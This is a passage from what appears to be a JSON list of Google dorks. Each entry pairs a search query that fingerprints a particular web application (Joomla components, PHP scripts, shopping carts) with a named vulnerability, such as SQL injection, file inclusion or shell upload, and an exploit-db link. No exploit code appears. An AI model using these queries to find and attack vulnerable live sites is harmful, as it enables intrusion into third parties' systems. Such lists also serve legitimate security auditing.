Vulnerability: https://www.exploit-db.com/exploits/11336"}, {"dork": "\"My Photo v1.46.4 \u00c2\u00a9 Big Resources\"", "description": "Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/7645"}, {"dork": "Powered by Fantastic News v2.1.4", "description": "Fantastic News 2.1.4 Multiple Remote File Include Vulnerabilities: https://www.exploit-db.com/exploits/3027"}, {"dork": "Platform Dokeos 1.8.4 \u00c2\u00a9 2007", "description": "Dokeos 1.8.4 Bypass Upload Shell From Your Profile Vulnerability - CVE: 2007-6479: https://www.exploit-db.com/exploits/4753"}, {"dork": "\"Powered by iScripts SocialWare\"", "description": "iScripts SocialWare (id) Remote SQL Injection Vulnerbility - CVE: 2008-1772: https://www.exploit-db.com/exploits/5402"}, {"dork": "Powered By eLitius 1.0", "description": "eLitius 1.0 Arbitrary Database Backup: https://www.exploit-db.com/exploits/8498"}, {"dork": "inurl:\"com_artlinks\"", "description": "Joomla Artlinks Component 1.0b4 Remote Include Vulnerability - CVE: 2006-3949: https://www.exploit-db.com/exploits/2209"}, {"dork": "inurl:com_djclassifieds", "description": "Joomla DJ-Classifieds Extension com_djclassifieds Upload Vulnerability: https://www.exploit-db.com/exploits/12479"}, {"dork": "inurl:ratelink.php?lnkid=", "description": "Link Trader (ratelink.php lnkid) Remote SQL Injection Vulnerability - CVE: 2008-6102: https://www.exploit-db.com/exploits/6650"}, {"dork": "Powered by: deonixscripts.com", "description": "Web Template Management System 1.3 Remote SQL Injection - CVE: 2007-5233: https://www.exploit-db.com/exploits/4482"}, {"dork": "inurl:com_ybggal", "description": "Joomla Component com_ybggal 1.0 (catid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13979"}, {"dork": "Powered By Power Editor", "description": "Power Editor 2.0 Remote File Disclosure / Edit Vulnerability - CVE: 2008-2116: https://www.exploit-db.com/exploits/5549"}, {"dork": "\"Powered by: eSmile\"", "description": "eSmile Script (index.php) SQL Injection Vulnerability - CVE: 2010-0764: https://www.exploit-db.com/exploits/11382"}, {"dork": "\"advanced_search_results.php?gender=\"", "description": "Vastal I-Tech Dating Zone (fage) SQL Injection Vulnerability - CVE: 2008-4461: https://www.exploit-db.com/exploits/6388"}, {"dork": "allinurl:\"com_ahsshop\"do=default", "description": "Mambo Component ahsShop 1.51 (vara) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5335"}, {"dork": "inurl:com_ice \"catid\"", "description": "Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln - CVE: 2008-6852: https://www.exploit-db.com/exploits/7572"}, {"dork": "Powered by ExoPHPDesk v1.2 Final.", "description": "ExoPHPDesk 1.2.1 (faq.php) Remote SQL Injection Vulnerability - CVE: 2007-0676: https://www.exploit-db.com/exploits/3234"}, {"dork": "allinurl:spaw2/dialogs/", "description": "Spaw Editor v1.0 & 2.0 Remote File Upload: https://www.exploit-db.com/exploits/12672"}, {"dork": "Powered by eLitius Version 1.0", "description": "eLitius 1.0 (banner-details.php id) SQL Injection Vulnerability - CVE: 2009-1506: https://www.exploit-db.com/exploits/8563"}, {"dork": "site:scartserver.com", "description": "SCart 2.0 (page) Remote Code Execution - CVE: 2006-7012: https://www.exploit-db.com/exploits/1876"}, {"dork": "\"realizacja eCreo.eu\"", "description": "eCreo SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12713"}, {"dork": "inurl:index.php?option=com_akobook", "description": "Joomla Component Akobook 2.3 (gbid) SQL Injection Vulnerability - CVE: 2009-2638: https://www.exploit-db.com/exploits/8911"}, {"dork": "inurl:\"/CMS/page.php?p=\"", "description": "Schweizer NISADA Communication CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10543"}, {"dork": "Powered by CMScout (c)2005 CMScout Group", "description": "CMScout 2.06 SQL Injection/Local File Inclusion Vulnerabilities - CVE: 2008-6725: https://www.exploit-db.com/exploits/7625"}, {"dork": "intext:\"\u00a9 Tainos Webdesign\"", "description": "Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability: https://www.exploit-db.com/exploits/12631"}, {"dork": "inurl:\"com_virtuemart\"", "description": "Joomla Component com_virtuemart SQL injection vulnerability (product_id): https://www.exploit-db.com/exploits/10407"}, {"dork": "\"Powered by RW::Download v2.0.3 lite\"", "description": "RW::Download 2.0.3 lite (index.php dlid) Remote SQL Injection Vuln - CVE: 2007-4845: https://www.exploit-db.com/exploits/4371"}, {"dork": "index.php?option=com_swmenupro", "description": "Joomla/Mambo Component SWmenuFree 4.0 RFI Vulnerability - CVE: 2007-1699: https://www.exploit-db.com/exploits/3557"}, {"dork": "\"Powered By OpenCart\"", "description": "Opencart 1.4.9.1 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/15050"}, {"dork": "Powered by eclime.com", "description": "eclime v1.1 ByPass / Create and Download Backup Vulnerability: https://www.exploit-db.com/exploits/12279"}, {"dork": "inurl:\"article.download.php\"", "description": "Star Articles 6.0 Remote Blind SQL Injection Vulnerability - CVE: 2008-7075: https://www.exploit-db.com/exploits/7240"}, {"dork": "inurl:\"com_mojo\"", "description": "Joomla MojoBlog Component v0.15 Multiple Remote File Include Vulnerabilities - CVE: 2009-4789: https://www.exploit-db.com/exploits/10273"}, {"dork": "inurl:\"article.download.php\"", "description": "Star Articles 6.0 Remote Blind SQL Injection - CVE: 2008-7075: https://www.exploit-db.com/exploits/7243"}, {"dork": "\"Powered by LightBlog\" - Powered by LightBlog", "description": "LightBlog 9.5 cp_upload_image.php Remote File Upload Vulnerability - CVE: 2008-0632: https://www.exploit-db.com/exploits/5033"}, {"dork": "\"Powered by photokorn\"", "description": "photokron 1.7 (update script) Remote Database Disclosure - CVE: 2008-0297: https://www.exploit-db.com/exploits/4897/"}, {"dork": "\"Powered by MetInfo 3.0\"", "description": "MetInfo 3.0 PHP Code Injection Vulnerability: https://www.exploit-db.com/exploits/15361"}, {"dork": "pages.php?id= \"Multi Vendor Mall\"", "description": "Multi Vendor Mall (pages.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12748"}, {"dork": "Powered by Zylone IT", "description": "Zylone IT Multiple Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14270"}, {"dork": "Powered by MetInfo 3.0", "description": "Metinfo v3.0 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/15496"}, {"dork": "Powered by Info Fisier.", "description": "Info Fisier 1.0 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/10671"}, {"dork": "\"Powered by WebText\"", "description": "WebText 0.4.5.2 Remote Code Execution - CVE: 2006-6856: https://www.exploit-db.com/exploits/3036"}, {"dork": "Webdevelopment Tinx-IT", "description": "WebVision 2.1 (news.php n) Remote SQL Injection: https://www.exploit-db.com/exploits/9193"}, {"dork": "\"PHPGlossar Version 0.8\"", "description": "PHPGlossar 0.8 (format_menue) Remote File Inclusion Vulnerabilities - CVE: 2007-2751: https://www.exploit-db.com/exploits/3941"}, {"dork": "com_ijoomla_rss", "description": "Joomla Component com_ijoomla_rss Blind SQL Injection - CVE: 2009-2099: https://www.exploit-db.com/exploits/8959"}, {"dork": "inurl:\"?pilih=forum\"", "description": "AuraCMS [Forum Module] Remote SQL Injection Vulnerability - CVE: 2007-4171: https://www.exploit-db.com/exploits/4254"}, {"dork": "Powered by Guruscript.com", "description": "Freelancer Marketplace Script Upload Vulnerability: https://www.exploit-db.com/exploits/14390"}, {"dork": "allinurl:\"index.php?mod=archives\"", "description": "KwsPHP Module Archives (id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5351"}, {"dork": "\"index.php?option=com_qcontacts\"", "description": "Joomla Component QContacts (com_qcontacts) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14350"}, {"dork": "\u00a9 Powered by sijio - Community Software", "description": "Sijio Community Software SQL Injection/Persistent XSS Vulnerability - CVE: 2010-2696: https://www.exploit-db.com/exploits/14260"}, {"dork": "Powered by TextAds 2.08", "description": "idevspot Text ads 2.08 sqli vulnerability - CVE: 2010-2319: https://www.exploit-db.com/exploits/13749"}, {"dork": "inurl:/com_chronocontact", "description": "Joomla Component ChronoForms 2.3.5 RFI Vulnerabilities - CVE: 2008-0567: https://www.exploit-db.com/exploits/5020"}, {"dork": "inurl:\"com_kochsuite\"", "description": "Joomla Kochsuite Component 0.9.4 Remote File Include Vulnerability - CVE: 2006-4348: https://www.exploit-db.com/exploits/2215"}, {"dork": "inurl:option=articles artid", "description": "Mambo Component Articles (artid) Blind SQL Injection: https://www.exploit-db.com/exploits/5935"}, {"dork": "inurl:\"com_jembed\"", "description": "com_jembed (catid) Blind SQL Injection - CVE: 2010-1073: https://www.exploit-db.com/exploits/11026"}, {"dork": "\"powered by Gradman\"", "description": "Gradman 0.1.3 (agregar_info.php) Local File Inclusion - CVE: 2008-0361: https://www.exploit-db.com/exploits/4926"}, {"dork": "inurl:com_bfsurvey_profree", "description": "Joomla Component BF Survey Pro Free SQL Injection - CVE: 2009-4625: https://www.exploit-db.com/exploits/9601"}, {"dork": "inurl:option=com_cinema", "description": "Joomla component cinema SQL injection Vulnerability: https://www.exploit-db.com/exploits/13792"}, {"dork": "inurl:com_jejob", "description": "Joomla JE Job Component com_jejob LFI Vulnerability: https://www.exploit-db.com/exploits/14063"}, {"dork": "inurl:prog.php?dwkodu=", "description": "Kolifa.net Download Script 1.2 (id) SQL Injection Vulnerability - CVE: 2008-4054: https://www.exploit-db.com/exploits/6310"}, {"dork": "\"Designed and powered by AWS Sports\"", "description": "Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14645"}, {"dork": "inurl:com_eportfolio", "description": "Joomla Component com_eportfolio Upload Vulnerability: https://www.exploit-db.com/exploits/13951"}, {"dork": "intext:\"Parlic Design\" inurl:id", "description": "parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12767"}, {"dork": "[ Powered by SkaDate dating ]", "description": "SkaDate Dating (RFI/LFI/XSS) Multiple Remote Vulnerabilities - CVE: 2009-4700: https://www.exploit-db.com/exploits/9260"}, {"dork": "inurl:com_jotloader", "description": "Joomla Component jotloader 1.2.1.a Blind SQL injection - CVE: 2008-2564: https://www.exploit-db.com/exploits/5737"}, {"dork": "inurl:/wp-content/plugins/fgallery/", "description": "Wordpress plugin fGallery 2.4.1 fimrss.php SQL Injection Vulnerability - CVE: 2008-0491: https://www.exploit-db.com/exploits/4993"}, {"dork": "\u00a9 2010 Powered by Subrion CMS", "description": "Subrion Auto Classifieds Persistent Xss Vulnerability: https://www.exploit-db.com/exploits/14391"}, {"dork": "Powered by Guruscript.com", "description": "Freelancers Marketplace Script Persistent XSS Vulnerability: https://www.exploit-db.com/exploits/14389"}, {"dork": "\"powered by jshop\"", "description": "JShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability - CVE: 2008-1624: https://www.exploit-db.com/exploits/5325"}, {"dork": "\"Powered by TS Special Edition\"", "description": "TS Special Edition v.7.0 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12645"}, {"dork": "inurl:/jobsearchengine/", "description": "i-netsolution Job Search Engine SQL Injection Vulnerability - CVE: 2010-2611: https://www.exploit-db.com/exploits/14079"}, {"dork": "inurl:\"com_jgen\"", "description": "Joomla Component (com_jgen) SQL Injection Vulnerability - CVE: 2010-3422: https://www.exploit-db.com/exploits/14998"}, {"dork": "inurl:com_n-forms", "description": "Joomla Component n-forms 1.01 Blind SQL Injection: https://www.exploit-db.com/exploits/6055"}, {"dork": "\"powered by gelato cms\"", "description": "Gelato (index.php post) Remote SQL Injectio - CVE: 2007-4918: https://www.exploit-db.com/exploits/4410"}, {"dork": "inurl:\"cont_form.php?cf_id=\"", "description": "WebDM CMS SQL Injection Vulnerability - CVE: 2010-2689: https://www.exploit-db.com/exploits/14123"}, {"dork": "allinurl:links.php?t=search", "description": "phpBB Links MOD 1.2.2 Remote SQL Injection - CVE: 2007-4653: https://www.exploit-db.com/exploits/4346"}, {"dork": "inurl:\"com_dateconverter\"", "description": "Joomla Component com_dateconverter 0.1 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14154"}, {"dork": "inurl:\"com_simplefaq\"", "description": "Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability - CVE: 2010-0632CVE: 2010-0632: https://www.exploit-db.com/exploits/11294"}, {"dork": "inurl:com_jb2", "description": "Joomla Component JooBlog 0.1.1 Blind SQL Injection - CVE: 2008-2630: https://www.exploit-db.com/exploits/5734"}, {"dork": "inurl:\"com_dms\"", "description": "Joomla Component com_dms SQL Injection Vulnerability - CVE: 2010-0800: https://www.exploit-db.com/exploits/11289"}, {"dork": "\"powered by: profitCode\"", "description": "PayProCart 1146078425 Multiple Remote File Include Vulnerabilities - CVE: 2006-4672: https://www.exploit-db.com/exploits/2316"}, {"dork": "Powered by UGiA PHP UPLOADER V0.2", "description": "UGiA PHP UPLOADER V0.2 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11261"}, {"dork": "Powered by iBoutique v4.0", "description": "iBoutique 4.0 (cat) Remote SQL Injection Vulnerability - CVE: 2008-4354: https://www.exploit-db.com/exploits/6444"}, {"dork": "\"index.php?option=com_expose\"", "description": "Joomla Component Expose RC35 Remote File Upload Vulnerability - CVE: 2007-3932: https://www.exploit-db.com/exploits/4194"}, {"dork": "inurl:yvcomment", "description": "Joomla Component yvcomment 1.16 Blind SQL Injection - CVE: 2008-2692: https://www.exploit-db.com/exploits/5755"}, {"dork": "\"kims Q - Administrator Login Mode\"", "description": "KimsQ 040109 Multiple Remote File Include Vulnerability: https://www.exploit-db.com/exploits/11960"}, {"dork": "inurl:\"com_hestar\"", "description": "Mambo Component com_hestar Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/9609"}, {"dork": "\"Powered by NovaBoard v1.0.0\"", "description": "NovaBoard 1.0.0 Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/8063"}, {"dork": "inurl:es_offer.php?files_dir=", "description": "Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4715: https://www.exploit-db.com/exploits/4352"}, {"dork": "inurl:index.php?option=com_joomlaconnect_be", "description": "Joomla Component com_joomlaconnect_be Blind Injection Vulnerability: https://www.exploit-db.com/exploits/11578"}, {"dork": "\"Powered by TinyPHPForum v3.61\"", "description": "TinyPHPForum 3.61 File Disclosure / Code Execution Vulnerabilities: https://www.exploit-db.com/exploits/8342"}, {"dork": "intitle:\"CCMS v3.1 Demo PW\"", "description": "CCMS 3.1 Demo Remote SQL Injection - CVE: 2007-6658: https://www.exploit-db.com/exploits/4809"}, {"dork": "\"powered by mcGalleryPRO\"", "description": "mcGalleryPRO 2006 (path_to_folder) Remote Include Vulnerability - CVE: 2006-4720: https://www.exploit-db.com/exploits/2342"}, {"dork": "Powered by Dayfox Designs This is a port of WordPress", "description": "Dayfox Blog 4 Multiple Local File Inclusion Vulnerabilities - CVE: 2008-3564: https://www.exploit-db.com/exploits/6203"}, {"dork": "\"Powered By EgyPlus\"", "description": "EgyPlus 7ml 1.0.1 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-2167: https://www.exploit-db.com/exploits/8865"}, {"dork": "inurl:com_seminar", "description": "Joomla Component Seminar 1.28 (id) Blind SQL Injection - CVE: 2009-4200: https://www.exploit-db.com/exploits/8867"}, {"dork": "allintext:\"Powered By Buddy Zone\"", "description": "Buddy Zone 1.5 Multiple SQL Injection Vulnerabilities - CVE: 2007-3526: https://www.exploit-db.com/exploits/4128"}, {"dork": "inurl:index.php?option=com_ice", "description": "Joomla Component com_ice Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11544"}, {"dork": "Powered by LiteCommerce", "description": "litecommerce 2004 (category_id) Remote SQL Injection Vulnerability - CVE: 2005-1032: https://www.exploit-db.com/exploits/4300"}, {"dork": "\"Web Group Communication Center\"", "description": "Web Group Communication Center (WGCC) 1.0.3 SQL Injection Vuln - CVE: 2008-2445: https://www.exploit-db.com/exploits/5606"}, {"dork": "inurl:com_xewebtv", "description": "Joomla Component Xe webtv (id) Blind SQL Injection - CVE: 2008-5200: https://www.exploit-db.com/exploits/5966"}, {"dork": "inurl:index.php?option=com_paxgallery", "description": "Joomla Component com_paxgallery Blind Injection Vulnerability: https://www.exploit-db.com/exploits/11595"}, {"dork": "Powered by iScripts SocialWare", "description": "Upload Vulnerability and XSS in socialware V2.2: https://www.exploit-db.com/exploits/12448"}, {"dork": "\"(C) This site is NITROpowered!\"", "description": "NITRO Web Gallery SQL Injection Vulnerability - CVE: 2010-2141: https://www.exploit-db.com/exploits/12735"}, {"dork": "\"phpQuestionnaire v3\"", "description": "phpQuestionnaire 3.12 (phpQRootDir) Remote File Include Vulnerability - CVE: 2006-4966: https://www.exploit-db.com/exploits/2410"}, {"dork": "\"generated by Exhibit Engine 1.5 RC 4\"", "description": "Exhibit Engine 1.5 RC 4 (photo_comment.php) File Include - CVE: 2006-5292: https://www.exploit-db.com/exploits/2509"}, {"dork": "powered by connectix boards", "description": "Connectix Boards 0.8.2 template_path Remote File Inclusion - CVE: 2008-0502: https://www.exploit-db.com/exploits/5012"}, {"dork": "inurl:com_ezstore", "description": "Joomla Component EZ Store Remote Blind SQL Injection - CVE: 2008-3586: https://www.exploit-db.com/exploits/6199"}, {"dork": "\"FrontAccounting\"", "description": "FrontAccounting 1.13 Remote File Inclusion Vulnerabilities - CVE: 2007-5117: https://www.exploit-db.com/exploits/4456"}, {"dork": "inurl:\"option=com_elite_experts\"", "description": "Joomla Component (com_elite_experts) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15100"}, {"dork": "inurl:\"com_tupinambis\"", "description": "Joomla/Mambo Tupinambis SQL Injection - CVE: 2009-3434: https://www.exploit-db.com/exploits/9832"}, {"dork": "\"Powered by AMCMS3\"", "description": "Arcadem 2.01 Remote SQL Injection / RFI Vulnerabilties: https://www.exploit-db.com/exploits/4326"}, {"dork": "\"Web Site Design by Red Cat Studios\"", "description": "Realtor WebSite System E-Commerce SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12772"}, {"dork": "allinurl:\"com_cinema\"", "description": "Joomla Component Cinema 1.0 Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5300"}, {"dork": "\"Powered by Clipshare\"", "description": "ClipShare 2.6 Remote User Password Change - CVE: 2008-7188: https://www.exploit-db.com/exploits/4837"}, {"dork": "\"Powered by PHPizabi v0.848b C1 HFP1\"", "description": "PHPizabi 0.848b C1 HFP1 Remote File Upload Vulnerability - CVE: 2008-0805: https://www.exploit-db.com/exploits/5136"}, {"dork": "inurl:com_jejob", "description": "Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12782"}, {"dork": "inurl:\"com_jpodium\"", "description": "Joomla JPodium Component (com_jpodium) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14232"}, {"dork": "intext:\"Powered by: Virtual War v1.5.0\"", "description": "VWar 1.50 R14 (online.php) Remote SQL Injection Vulnerability - CVE: 2006-4142: https://www.exploit-db.com/exploits/2170"}, {"dork": "inurl:index.php/option?com_flexicontent", "description": "Joomla Component com_flexicontent Local File Vulnerability: https://www.exploit-db.com/exploits/12185"}, {"dork": "inurl:option=com_agenda", "description": "Joomla Component com_agenda 1.0.1 (id) SQL Injection Vulnerability - CVE: 2010-1716: https://www.exploit-db.com/exploits/12132"}, {"dork": "inurl:\"index.php?css=mid=art=\"", "description": "EasyWay CMS (index.php mid) Remote SQL Injection - CVE: 2008-2555: https://www.exploit-db.com/exploits/5706"}, {"dork": "\"Powered By Webcards\"", "description": "WebCards 1.3 Remote SQL Injection Vulnerability - CVE: 2008-4878: https://www.exploit-db.com/exploits/6869"}, {"dork": "Powered by Bug Software intext:Your Cart Contains", "description": "BugMall Shopping Cart 2.5 (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2007-3448: https://www.exploit-db.com/exploits/4103"}, {"dork": "Winn ASP Guestbook from Winn.ws", "description": "Winn ASP Guestbook 1.01b Remote Database Disclosure - CVE: 2009-4760: https://www.exploit-db.com/exploits/8596"}, {"dork": "inurl:option=com_n-forms form_id", "description": "Mambo Component n-form (form_id) Blind SQL Injection: https://www.exploit-db.com/exploits/7064"}, {"dork": "intext:\"English for dummies\"", "description": "Mobilelib Gold v3 Local File Disclosure Vulnerability - CVE: 2009-3823: https://www.exploit-db.com/exploits/9144"}, {"dork": "inurl:\"com_lyftenbloggie\" / \"Powered by LyftenBloggie\"", "description": "Joomla Component com_lyftenbloggie 1.04 Remote SQL Injection Vulnerability - CVE: 2009-4104: https://www.exploit-db.com/exploits/10238"}, {"dork": "\"Powered by GGCMS\"", "description": "GGCMS 1.1.0 RC1 Remote Code Execution - CVE: 2007-0804: https://www.exploit-db.com/exploits/3271"}, {"dork": "inurl:index.php?menu=showcat", "description": "ACG-ScriptShop (cid) Remote SQL Injection Vulnerability - CVE: 2008-4144: https://www.exploit-db.com/exploits/6364"}, {"dork": "Powered by minb", "description": "minb 0.1.0 Remote Code Execution - CVE: 2008-7005: https://www.exploit-db.com/exploits/6432"}, {"dork": "\"Powered by phpCC Beta 4.2\"", "description": "phpCC 4.2 beta (base_dir) Remote File Inclusion Vulnerability - CVE: 2006-4073: https://www.exploit-db.com/exploits/2134"}, {"dork": "inurl:index.php?menu=showcat=", "description": "Alstrasoft Forum (cat) Remote SQL Injection Vulnerability - CVE: 2008-3954: https://www.exploit-db.com/exploits/6396"}, {"dork": "intext:elkagroup Image Gallery v1.0", "description": "elkagroup Image Gallery 1.0 Remote SQL Injection Vulnerability - CVE: 2007-3461: https://www.exploit-db.com/exploits/4114"}, {"dork": "\"powered by AMCMS3\"", "description": "Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection - CVE: 2008-0262: https://www.exploit-db.com/exploits/4905"}, {"dork": "inurl:\"e107_plugins/my_gallery\"", "description": "e107 Plugin My_Gallery 2.3 Arbitrary File Download Vulnerability - CVE: 2008-1702: https://www.exploit-db.com/exploits/5308"}, {"dork": "\"Powered by BIGACE 2.4\"", "description": "BIGACE 2.4 Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-2520: https://www.exploit-db.com/exploits/5596"}, {"dork": "\"Powered by www.aspportal.net\"", "description": "ASPPortal Free Version (Topic_Id) Remote SQL Injection Vulnerability - CVE: 2008-5268: https://www.exploit-db.com/exploits/5775"}, {"dork": "inurl:\"com_ijoomla_archive\"", "description": "Joomla com_ijoomla_archive Blind SQL Injectio: https://www.exploit-db.com/exploits/8164"}, {"dork": "\"Power by Blakord Portal\"", "description": "Blakord Portal Beta 1.3.A (all modules) SQL Injection Vulnerability - CVE: 2007-6565: https://www.exploit-db.com/exploits/4793"}, {"dork": "inurl:option=com_mv_restaurantmenumanager", "description": "Joomla component mv_restaurantmenumanager SQL injection Vulnerability: https://www.exploit-db.com/exploits/12162"}, {"dork": "inurl:\"com_ajaxchat\"", "description": "Joomla Ajax Chat 1.0 remote file inclusion - CVE: 2009-3822: https://www.exploit-db.com/exploits/9888"}, {"dork": "Powered by: AIH v2.3", "description": "Advanced Image Hosting (AIH) 2.3 (gal) Blind SQL Injection Vuln - CVE: 2009-1032: https://www.exploit-db.com/exploits/8238"}, {"dork": "inurl:/macgurublog_menu/", "description": "e107 Plugin BLOG Engine 2.2 (rid) Blind SQL Injection Vulnerability - CVE: 2008-2455: https://www.exploit-db.com/exploits/5604"}, {"dork": "inurl:\"?page=duyurular_detay&id=\"", "description": "Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities - CVE: 2007-4068: https://www.exploit-db.com/exploits/4224"}, {"dork": "\"X-CART. Powerful PHP shopping cart software\"", "description": "X-Cart ? Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4907: https://www.exploit-db.com/exploits/4396"}, {"dork": "allinurl:offers.php?id=", "description": "B2B Classic Trading Script (offers.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12532"}, {"dork": "\"Powered By HASHE\"", "description": "HASHE! Solutions Multiple SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/11383"}, {"dork": "inurl:we_objectID=", "description": "webEdition CMS (we_objectID) Blind SQL Injection - CVE: 2008-4154: https://www.exploit-db.com/exploits/6281"}, {"dork": "\"2009 Jorp\"", "description": "Jorp 1.3.05.09 Remote Arbitrary Remove Projects/Tasks Vulnerabilities: https://www.exploit-db.com/exploits/8752"}, {"dork": "Powered by Orbis CMS", "description": "Orbis CMS 1.0 (AFD/ADF/ASU/SQL) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/9309"}, {"dork": "inurl:\"index.php?edicion_id=\"", "description": "Delivering Digital Media CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12840"}, {"dork": "inurl:\"CIHUY\"", "description": "Joomla Component (com_joomdle) SQL Injection Vulnerability - CVE: 2010-2908: https://www.exploit-db.com/exploits/14466"}, {"dork": "\"/subcat.php?cate_id=\"", "description": "AJ Forum 1.0 (topic_title.php) Remote SQL Injection - CVE: 2007-1295: https://www.exploit-db.com/exploits/3411"}, {"dork": "Powered by Marinet", "description": "Marinet cms SQL/XSS/HTML Injection Vulnerability: https://www.exploit-db.com/exploits/12577"}, {"dork": "allinurl:clientsignup.php \"classifieds\"", "description": "Living Local 1.1 (XSS-RFU) Multiple Remote Vulnerabilities - CVE: 2008-6530: https://www.exploit-db.com/exploits/7408"}, {"dork": "Powered by TeamCal Pro", "description": "TeamCalPro 3.1.000 Multiple Remote/Local File Inclusion Vulnerabilities - CVE: 2007-6553: https://www.exploit-db.com/exploits/4785"}, {"dork": "\"mumbo jumbo media\" + inurl:\"index.php\"", "description": "Mumbo Jumbo Media OP4 Remote Blind SQL Injection - CVE: 2008-6477: https://www.exploit-db.com/exploits/5440"}, {"dork": "intext:\"pLink 2.07\"", "description": "pLink 2.07 (linkto.php id) Remote Blind SQL Injection - CVE: 2008-4357: https://www.exploit-db.com/exploits/6449"}, {"dork": "\"Powered by Scripteen Free Image Hosting Script V1.2\"", "description": "Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber - CVE: 2008-3211: https://www.exploit-db.com/exploits/6070"}, {"dork": "allinurl:casting_view.php?adnum=", "description": "Modelbook (casting_view.php) SQL Injection Vulnerability - CVE: 2010-1705: https://www.exploit-db.com/exploits/12443"}, {"dork": "inurl:/jobsearchengine/", "description": "I-net Multi User Email Script SQLi Vulnerability: https://www.exploit-db.com/exploits/14095"}, {"dork": "VevoCart Control System", "description": "Asp VevoCart Control System Version 3.0.4 DB Download Vulnerability: https://www.exploit-db.com/exploits/11134"}, {"dork": "inurl:\"com_digifolio\"", "description": "Joomla Component com_digifolio 1.52 (id) SQL Injection Vulnerability - CVE: 2009-3193: https://www.exploit-db.com/exploits/9534"}, {"dork": "\"index.php?option=com_resman\"", "description": "Joomla Component Car Manager 1.1 Remote SQL Injection - CVE: 2007-1704: https://www.exploit-db.com/exploits/3564"}, {"dork": "allinurl:offers_buy.php?id=", "description": "EC21 Clone 3.0 (id) SQL Injection Vulnerability - CVE: 2010-1726: https://www.exploit-db.com/exploits/12459"}, {"dork": "inurl:/jobsearchengine/", "description": "I-net Multi User Email Script SQLi Vulnerability: https://www.exploit-db.com/exploits/14129"}, {"dork": "\"index.php?option=com_rwcards\"", "description": "Joomla Component RWCards 2.4.3 Remote SQL Injection - CVE: 2007-1703: https://www.exploit-db.com/exploits/3565"}, {"dork": "inurl:/jobsearchengine/", "description": "I-net Multi User Email Script SQLi Vulnerability: https://www.exploit-db.com/exploits/14114"}, {"dork": "intext:\"Powered by Atomic Photo Album 1.1.0pre4\"", "description": "Atomic Photo Album 1.1.0pre4 Blind SQL Injection - CVE: 2008-4335: https://www.exploit-db.com/exploits/6574"}, {"dork": "inurl:\"com_fastball\"", "description": "Joomla Fastball component 1.1.0-1.2 SQL Injection - CVE: 2009-3443: https://www.exploit-db.com/exploits/9822"}, {"dork": "Lebi soft Ziyaretci Defteri_v7.5", "description": "Lebi soft Ziyaretci Defteri_v7.5 DB Download Vulnerabilit - CVE: 2010-1065: https://www.exploit-db.com/exploits/11015"}, {"dork": "allinurl:offers_buy.php?id=", "description": "Alibaba Clone Platinum (offers_buy.php) SQL Injection Vulnerability - CVE: 2010-1725: https://www.exploit-db.com/exploits/12468"}, {"dork": "[ Powered by: RadBids Gold v4 ]", "description": "RadBIDS GOLD v4 Multiple Remote Vulnerabilities - CVE: 2009-3529: https://www.exploit-db.com/exploits/9194"}, {"dork": "\"/subcat.php?cate_id=\"", "description": "AJ Auction Pro All Versions (subcat.php) Remote SQL Injection - CVE: 2007-1298: https://www.exploit-db.com/exploits/3408"}, {"dork": "\"Desenvolvido por: Fio Mental\"", "description": "Fiomental & Coolsis Backoffice Multi Vulnerability: https://www.exploit-db.com/exploits/12563"}, {"dork": "\"Powered by ProjectCMS\"", "description": "ProjectCMS 1.0b (index.php sn) Remote SQL Injection Vulnerability - CVE: 2009-1500: https://www.exploit-db.com/exploits/8565"}, {"dork": "Powered by DorsaCms", "description": "DorsaCms (ShowPage.aspx) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6810"}, {"dork": "powered by QT-cute v1.2", "description": "QuickTalk v1.2 (Source code disclosure) Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12817"}, {"dork": "\u00a9 1998 - 2010 Video Battle Script", "description": "PHP Video Battle SQL Injection Vulnerability - CVE: 2010-1701: https://www.exploit-db.com/exploits/12444"}, {"dork": "inurl:\"com_facebook\"", "description": "Joomla com_facebook SQL Injection - CVE: 2009-3438: https://www.exploit-db.com/exploits/9833"}, {"dork": "inurl:/modules/kshop/", "description": "XOOPS Module Kshop 1.17 (id) Remote SQL Injectio - CVE: 